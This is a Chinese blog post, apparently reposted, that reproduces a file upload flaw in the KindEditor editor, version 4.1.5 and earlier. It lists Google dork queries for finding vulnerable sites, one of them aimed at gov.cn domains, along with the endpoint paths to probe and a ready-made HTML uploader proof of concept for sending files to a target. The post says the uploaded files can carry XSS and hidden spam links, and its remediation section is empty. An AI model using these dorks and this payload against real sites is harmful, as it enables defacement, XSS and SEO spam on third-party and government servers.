kindeditor=4.1.5上传漏洞复现
0x00 漏洞描述
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中
这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2")
0x01 批量搜索
在google中批量搜索:
inurl:/examples/uploadbutton.htmlinurl:/php/upload_json.phpinurl:/asp.net/upload_json.ashxinurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/
0x02 漏洞问题
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在
/asp/upload_json.asp/asp.net/upload_json.ashx/jsp/upload_json.jsp/php/upload_json.php
可目录变量查看是否存在那种脚本上传漏洞:
kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file
0x03 漏洞利用
google搜素一些存在的站点 inurl:kindeditor
1.查看版本信息
http://www.xxx.org/kindeditor//kindeditor.js
2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.*
kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file
3.如下图可以看出是存在jsp上传点:
http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file
4.写出下面的构造上传poc,这里需要修改<script>...<script>以及url : 的内容,根据实际情况修改.
<html><head><title>Uploader</title><script src="http://www.xxx.org/kindeditor//kindeditor.js"></script><script>KindEditor.ready(function(K) {var uploadbutton = K.uploadbutton({button : K('#uploadButton')[0],fieldName : 'imgFile',url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',afterUpload : function(data) {if (data.error === 0) {var url = K.formatUrl(data.url, 'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e) {uploadbutton.submit();});});</script></head><body><div class="upload"><input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /><input type="button" id="uploadButton" value="Upload" /></div></body></html>
5.用浏览器打开,然后开启bupsuit进行拦截发送,可以看到成功上传txt文件
0x04 漏洞修复
转载于:https://www.cnblogs.com/backlion/p/10421405.html
kindeditor=4.1.5上传漏洞复现相关推荐
- Kindeditor上传漏洞复现(CVE-2017-1002024)
Kindeditor上传漏洞复现(CVE-2017-1002024) 文章目录 Kindeditor上传漏洞复现(CVE-2017-1002024) 1. 漏洞简述 2. 组件概述 3. 漏洞原理 4 ...
- php kindeditor 文件不存在_不能取得文件类型!,kindeditor=4.1.5文件上传漏洞复现
原标题:kindeditor<=4.1.5文件上传漏洞复现 0x00:背景 KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE.Fire ...
- UEditor .Net版本任意文件上传漏洞复现总结
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...
- Apache Fink 文件上传漏洞复现及利用
Apache Fink 文件上传漏洞复现 打开vulhub靶场,输入命令 cd flink/CVE-2020-17519 sudo docker-compose up -d sudo docker-c ...
- 畅捷通T+ v17任意文件上传漏洞复现
1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...
- 和信创天云桌面系统VENGD文件上传漏洞复现
1.漏洞概述 和信创天下一代云桌面系统融合了VDI.VOI.IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理.安全.运维 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
最新文章
- 5获取http请求头_获取托管者发送http请求报文的解决方案
- loadrunner简单使用——HTTP,WebService,Socket压力测试脚本编写
- linux inotifywait脚本,使用inotify/fswatch构建自动监控脚本
- 【转载】C#中List集合使用Exists方法判断是否存在符合条件的元素对象
- 手把手教你搭建开发环境之Java开发
- 13 - java包装类
- 剑指offer48-最长不含重复字符的子字符串(双指针经典)
- ARMLINUX学习笔记(3)---安装交叉编译器
- 输出最长上升子序列 模型(DP)
- Extjs的打印解决方案
- ACM程序设计竞赛开幕式致辞
- Windows 配置libjpeg-turbo并在python中调用
- 技巧:Eclipse阿里代码规范插件
- github中文件夹名带数字,git下来为空文件夹
- PDF编辑器中文版免费下载哪里可以下载?
- Linux Ruby安装
- 如何让 uni-app 页面中的背景图片高度和宽度自适应
- 叠加dgv中相同的行信息
- ad16以上的版本中怎么裁剪PCB板
- 关系型数据库与非关系型数据库详细比较